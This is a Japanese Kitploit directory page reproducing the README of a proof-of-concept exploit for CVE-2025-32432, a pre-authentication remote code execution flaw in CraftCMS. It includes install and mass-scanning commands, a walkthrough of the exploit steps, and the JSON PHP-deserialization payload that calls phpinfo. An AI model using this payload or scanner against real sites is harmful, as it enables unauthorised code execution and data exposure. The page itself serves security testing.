Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32432 — このリポジトリには、CVE-2025-32432の概念実証エクスプロイトスクリプトが含まれています。これは、CraftCMS バージョン4.xおよび5.xに影響を与える事前認証のリモートコード実行(RCE)脆弱性です。この脆弱性は、CraftCMSのアセット変換生成機能に存在します。 | Kitploit
ツール/GitHubGitHub/sachinart/cve-2025-32432
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubsachinart/cve-2025-32432

CVE-2025-32432

このリポジトリには、CVE-2025-32432の概念実証エクスプロイトスクリプトが含まれています。これは、CraftCMS バージョン4.xおよび5.xに影響を与える事前認証のリモートコード実行(RCE)脆弱性です。この脆弱性は、CraftCMSのアセット変換生成機能に存在します。

リポジトリを見る
27481年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CraftCMS CVE-2025-32432 Exploit By Chirag Artani

概要

このリポジトリには、CraftCMS バージョン 4.x および 5.x に影響を与える事前認証リモートコード実行(RCE)脆弱性 CVE-2025-32432 の概念実証エクスプロイトスクリプトが含まれています。この脆弱性は、CraftCMS のアセット変換生成機能に存在します。

このエクスプロイトスクリプトは、以下の手順で脆弱性の検出と確認を自動化します。

  1. CraftCMS 管理ダッシュボードからの CSRF トークンの抽出
  2. PHP オブジェクトインジェクションによる脆弱性の悪用
  3. システム情報の抽出による悪用成功の確認

免責事項

⚠️ このツールは教育目的および許可されたセキュリティテスト目的でのみ提供されています。

明示的なテスト許可を得たシステムに対してのみこのツールを使用してください。許可なくシステムに対して不正なテストを行うことは違法かつ非倫理的です。

機能

  • 単一ターゲットおよび複数ターゲット(ファイルベース)のスキャンに対応
  • 複数ターゲットの高速スキャンに対応したマルチスレッド機能
  • データベース名やホームディレクトリ情報を含む詳細な出力
  • 脆弱なターゲットの CSV レポート生成
  • 自己署名証明書を使用したテストのための SSL 検証バイパス
  • 堅牢なエラーハンドリング

インストール

# リポジトリをクローン
git clone https://github.com/Sachinart/CVE-2025-32432.git
cd CVE-2025-32432

# 必要な依存関係をインストール
pip install -r requirements.txt

必要条件

  • Python 3.6+
  • 必要な Python パッケージ(requirements.txt を参照):
    • requests
    • beautifulsoup4
    • urllib3

使用方法

単一ターゲット

単一のターゲットをスキャンする場合:

python3 craftcms_rce.py -u example.com

複数ターゲット

ファイルから複数のターゲットをスキャンする場合(1行に1つのURL):

python3 craftcms_rce.py -f urls.txt -t 10

-t は使用するスレッド数を指定します(デフォルトは5)。

オプション

-u, --url     テスト対象の単一URL
-f, --file    テストするURLを含むファイル(1行に1つ)
-t, --threads スレッド数(デフォルト: 5)
-h, --help    ヘルプメッセージを表示して終了

出力

スクリプトは結果をコンソールに出力し、脆弱なターゲットを以下の列を含むCSV形式で vulnerable.txt に保存します。

  • URL
  • CRAFT_DB_DATABASE の値(データベース名)
  • HOME ディレクトリのパス
  • その他のシステム情報

コンソール出力の例:

[*] Testing single target: https://example.com
[*] Starting scan with 5 threads
[+] VULNERABLE: https://example.com
    CRAFT_DB_DATABASE: example_db
    HOME Directory: /home/example

=== SCAN SUMMARY ===
Total URLs scanned: 1
Vulnerable sites: 1
Detailed results saved to vulnerable.txt

脆弱性の仕組み

この脆弱性は、CraftCMS のデシリアライゼーション問題を悪用します。エクスプロイトは以下の手順で動作します。

  1. GET リクエストを /index.php?p=admin/dashboard に送信し、CSRF トークンを取得
  2. 特別に細工されたJSONペイロードを含む POST リクエストを /index.php?p=admin/actions/assets/generate-transform に送信
  3. ペイロードには、デシリアライズされるPHPオブジェクトが含まれており、GuzzleHttp\Psr7\FnStream クラスを通じて任意のコード実行につながる
  4. phpinfo() を実行し、特定のシステム情報を抽出することで、悪用成功を確認

技術的詳細

このエクスプロイトは、アセット変換生成プロセスにおける安全でないデシリアライゼーションを利用します。脆弱なコードパスにより、攻撃者はカスタムPHPオブジェクトを注入でき、そのオブジェクトがアンシリアライズされて任意のコード実行に至ります。

ペイロードの主要コンポーネント:

{
  "assetId": 11,
  "handle": {
    "width": 123,
    "height": 123,
    "as session": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "GuzzleHttp\\Psr7\\FnStream",
      "__construct()": [[]],
      "_fn_close": "phpinfo"
    }
  }
}

貢献

貢献、問題報告、機能リクエストは歓迎します! issues ページ をご確認ください。

ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。

参考文献

  • CVE-2025-32432 詳細
  • CraftCMS セキュリティアドバイザリ

著者

  • Nicolas Bourras (Orange Cyberdefense) - 脆弱性の最初の発見者
  • Chirag Artani - エクスプロイトスクリプトの作成者
ツールをダウンロード